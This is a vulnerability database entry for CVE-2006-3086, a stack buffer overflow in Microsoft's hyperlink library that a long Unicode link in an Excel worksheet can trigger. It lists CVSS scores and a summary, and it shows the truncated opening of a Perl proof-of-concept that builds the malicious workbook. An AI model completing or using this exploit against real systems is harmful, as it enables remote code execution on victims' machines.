9.3
CVSSv2

CVE-2006-3086

Published: 19/06/2006 Updated: 18/10/2018
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
VMScore: 935
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Stack-based buffer overflow in the HrShellOpenWithMonikerDisplayName function in Microsoft Hyperlink Object Library (hlink.dll) allows remote malicious users to cause a denial of service (crash) and possibly execute arbitrary code via a long hyperlink, as demonstrated using an Excel worksheet with a long link in Unicode, aka "Hyperlink COM Object Buffer Overflow Vulnerability." NOTE: this is a different issue than CVE-2006-3059.

Vulnerable Product Search on Vulmon Subscribe to Product

microsoft hyperlink object library

Exploits

############################### # excelsexywarezpl # excel unicode overflow poc # by kcope in 2006 # thanks to revoguard and alex ############################### use Spreadsheet::WriteExcel; my $workbook = Spreadsheet::WriteExcel->new("FUCKxls"); $worksheet = $workbook->add_worksheet(); $format = $workbook->add_format(); $ ...